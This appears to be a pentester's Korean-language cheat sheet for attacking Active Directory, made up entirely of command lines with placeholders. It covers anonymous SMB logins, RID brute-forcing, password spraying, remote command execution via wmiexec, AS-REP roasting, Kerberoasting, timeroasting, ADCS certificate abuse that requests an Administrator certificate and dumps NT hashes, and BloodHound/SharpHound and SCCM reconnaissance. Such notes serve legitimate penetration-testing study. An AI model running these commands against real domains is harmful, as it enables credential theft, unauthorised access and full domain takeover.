Mindmap

# SMB / FTP 익명 로그인
nxc smb <dc-ip> -u '' -p ''
nxc smb <dc-ip> -u 'Guest' -p ''

# RID Cycling
nxc smb <dc-ip> -u '' -p '' --rid-brute

# 도메인 계정/공유 폴더 목록 열거
nxc smb <dc-ip> -u '' -p '' --users / --shares

# 인증 후 원격 명령 실행
nxc smb <dc-ip> -u 'wiki' -p 'Password123!' --exec-method wmiexec -X 'whoami'

# 스프레이
nxc smb <dc-ip> -u <user-list> -p 'Password123!' --continue-on-success

# AS Rep Roasting
impacket-GetNPUsers <Domain>/'' -usersfile <user-list> -dc-ip <dc-ip> 

# AS Requested Service Ticket
impacket-GetUserSPNs -no-preauth <user> -usersfile <user-list> -dc-host <dc-ip> <domain>/

# Timeroasting
python3 timeroast.py <dc-ip>

# Kerberoasting
impacket-GetUserSPNs <domain/user:pass> -request

# 취약한 템플릿 열거
certipy-ad find -u <user> -p <pass> -dc-ip <dc-ip> -vulnerable -stdout -enable

# 인증서 요청
certipy-ad req -u <user> -p <pass> -ca <ca> -target <dc-fqdn> -template <template> -dc-ip <dc-ip> -upn Administrator

# NT해시 덤프
certipy-ad auth-pfx administrator.pfx -domain <domain> -dc-ip <dc-ip>

# bloodhound
bloodhound-python -d <domain> -u <user> -p <pass> -gc <domain> -c All --zip -nc <dc-ip>

# sharphound
./sharphound.exe -c All -d <domain>

# sccm hunter
python3 sccmhunter.py find -u <user> -p <pass> -d <domain> -dc-ip <dc-ip> -debug

# ldeep
ldeep ldap -u <user> -p <pass> -d <domain> -s ldap://<dc-ip> sccm